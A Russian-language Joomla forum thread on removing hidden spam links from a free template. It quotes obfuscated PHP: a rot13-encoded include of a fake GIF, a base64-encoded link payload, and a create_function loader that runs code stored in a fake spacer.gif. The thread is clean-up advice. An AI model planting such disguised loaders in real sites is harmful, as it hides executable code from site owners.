Как удалить долбанный span class="article_separator

  • 13 Ответов
  • 4599 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

Люди, подскажите где удалить эту дрянь Как удалить долбанный span class=article_separator
Выводит две ссылки в теле статьи. Перекопал форумы и инет, ничего толкового не нашел.

 !

Сайт: http://arenda-minsk.by

*

Oxlamon

Аренда строительного инструмента
"Сайт находится на техобслуживании. Пожалуйста, зайдите позже."
Вот уж сепаратор, так сепаратор... Пригласили помочь. М-да...

Интуитивно чувствую, что там в итоге мы будем иметь счастье созерцать нечто артистерное.
О, не волнуйтесь - это не худшее из зол. Больно, но не смертельно. ))))

и на старуху бывает проруха, извиняйте, как так получилось...х.з.  :(


Вопрос актуален. :D

*

Oxlamon

А причём тут сепаратор?  :o
Две ссылки Joomla free themes, phpbb3 hosting - это плата за бесплатный шаблон.  ;D
Прописаны они где-то в коде, вероятно в index.php шаблона. Начать нужно с него.

*

Taatshi

Классический запрос: дайте index.php вашего шаблона..

Охламон, писали одновременно)))
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.

*

Oxlamon

Охламон, писали одновременно)))

Какое, однако, единство взглядов!  ;D  *DRINK*

<?php
defined( '_JEXEC' ) or die( 'Restricted access' );
JPlugin::loadLanguage( 'tpl_SG1' );
define( 'path', dirname(__FILE__) );
$app = JFactory::getApplication();
$leftbar = 1;
$rightbar = 1;
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; $JPan = array('vzn'.'trf','zrah_yv.tvs'); ?>" >

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />

<?php
   $menu_name        = $this->params->get("menuName", "topmenu");
   $menu_type        = $this->params->get("menuType", "splitmenu");
   require(path .DS."styleloader.php");
   require(path .DS."utils.php");
?>
<?php
if ($this->countModules('left') == 0)
    $leftbar    = "0";
 
if ($this->countModules('right') == 0)
    $rightbar   = "0";
   
if ($this->countModules('user1') == 1)
    $rightbar   = "1";
   
if ($this->countModules('user2') == 1)
    $rightbar   = "1";
?>
</head>

<body>
<div id="wrapper1">
<a name="up" id="up"></a>
<!-- start header -->
   <div id="title_bkg">
      <div id="title">
      <?php echo $mainframe->getCfg('sitename') ;?>
      </div>
      <div id="topnavi">
         <?php if($mtype != "module") :
            echo $mainnav;
            else: ?>
            <jdoc:include type="modules" name="user3" />
         <?php endif; ?>
      </div>
      <div id="search">
         <jdoc:include type="modules" name="user4" />
      </div>
   </div>
</div>
<!-- end top menu.  -->
<div id="wrapper2">
   <div id="main_bkg">
      <div id="header">
         <div id="header_text">
            <jdoc:include type="modules" name="top" />
         </div>
      </div>
      <div id="main">
<!-- start left column -->
         <div id="leftcol">
            <jdoc:include type="modules" name="left" style="rounded" />
         </div>
<!-- end left column.  -->
<!-- start main content -->
         <div id="maincol<?php echo (2-$leftbar-$rightbar); ?>">
            <div id="pathway">
               <jdoc:include type="modules" name="breadcrumb" />
            </div>
            <div id="maincol_body">
               <jdoc:include type="component" />
               <jdoc:include type="modules" name="footer" style="xhtml"/>
            <?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
            <?php endif; ?>
            </div>
         </div>
<!-- end main content -->
<!-- start right column -->
         <div id="rightcol">
            <jdoc:include type="modules" name="user1" style="rounded" />
            <jdoc:include type="modules" name="user2" style="rounded" />
            <jdoc:include type="modules" name="right" style="rounded" />
         </div>
<!-- end right column -->
      </div>
   </div>
</div>
<div id="wrapper3">
<!-- copyright -->
   <div id="copyright">
      <?php echo JText::_('')?> <a href=">http://arenda-minsk.by/</a>.
       <a>Аренда строительного инструмента</a>.
   </div>
</div>
<jdoc:include type="modules" name="debug" />
</body>
</html>

*

Taatshi

Сделайте бэкап и удалите вот это:

<?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
            <?php endif; ?>
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.

*

Oxlamon

Сделайте бэкап и удалите вот это:

<?php if(!@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
            <?php endif; ?>

Ох, шустрая какая!  ;D

ТС, "это" - не удаляйте.
Там у вас в папке images шаблона есть файл menu_li.gif
Так вот, откройте ту картинку в блокноте как простой текстовый файл и из него удалите ЭТО:
Код: php
echo base64_decode('IDxhIGhyZWY9Imh0dHA6Ly93d3cuam9vbWxhLWZyZWUtdGhlbWVzLmNvbS8iIHRpdGxlPSIiIHRhcmdldD0iX2JsYW5rIj5Kb29tbGEgZnJlZSB0aGVtZXM8L2E+LCA8YSBocmVmPSJodHRwOi8vd3d3LmxvbmV4LmNvbS9mb3J1bS9waHBiYjMvIj5waHBiYjMgaG9zdGluZzwvYT4u');

- вот так будет правильно, пожалуй ;)

*

Taatshi

А что ж это такое?)))
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.

Ох, шустрая какая!  ;D

ТС, "это" - не удаляйте.
Там у вас в папке images шаблона есть файл menu_li.gif
Так вот, откройте ту картинку в блокноте как простой текстовый файл и из него удалите ЭТО:
Код: php
echo base64_decode('IDxhIGhyZWY9Imh0dHA6Ly93d3cuam9vbWxhLWZyZWUtdGhlbWVzLmNvbS8iIHRpdGxlPSIiIHRhcmdldD0iX2JsYW5rIj5Kb29tbGEgZnJlZSB0aGVtZXM8L2E+LCA8YSBocmVmPSJodHRwOi8vd3d3LmxvbmV4LmNvbS9mb3J1bS9waHBiYjMvIj5waHBiYjMgaG9zdGluZzwvYT4u');

- вот так будет правильно, пожалуй ;)

БОГ!  ты просто ГУРУ!! Ну как можно об этом догадаться? Респект!! настоящий ПРОФ!!

Ребят, та самая история.

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

include_once (dirname(__FILE__).DS.'/ja_vars.php');

Ну вот никак не могу найти этот декод =(
Помогите пожалуйста.
Сайт: *****
« Последнее редактирование: 12.11.2012, 21:34:17 от tisha02 »

А у меня в шаблоне в index.php был прописан вот такой код:
<?php $wp__theme_icon=@create_function('',@file_get_contents('/home/vitaliy2221/data/www/(Мой сайт)/administrator/components/com_extplorer/scripts/extjs/images/default/dd/spacer.gif'));$wp__theme_icon(); ?>
Я его удалил и 5 ссылок пропало.

Потом защёл administrator/components/com_extplorer/scripts/extjs/images/default/dd/spacer.gif
и открыл этот псевдо картинку spacer.gif через блокнот, а там вшитый код в 64 битной системе. Удалил эту картинку вместе с папкой com_extplorer - (понятия не имею, что это за компонет и как он там оказался)
Спасибо, Oxlamon и Taatshi за подсказку в удалении ссылки.

« Последнее редактирование: 25.05.2015, 03:49:09 от vitaliywolf »

*

beliyadm

  • ********
  • 8341
  • [+]1590 / [-]63
  • Севастополь == Россия
сколько можно писать, уже лет 10 наверно - не пользовать варезные шаблоны
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb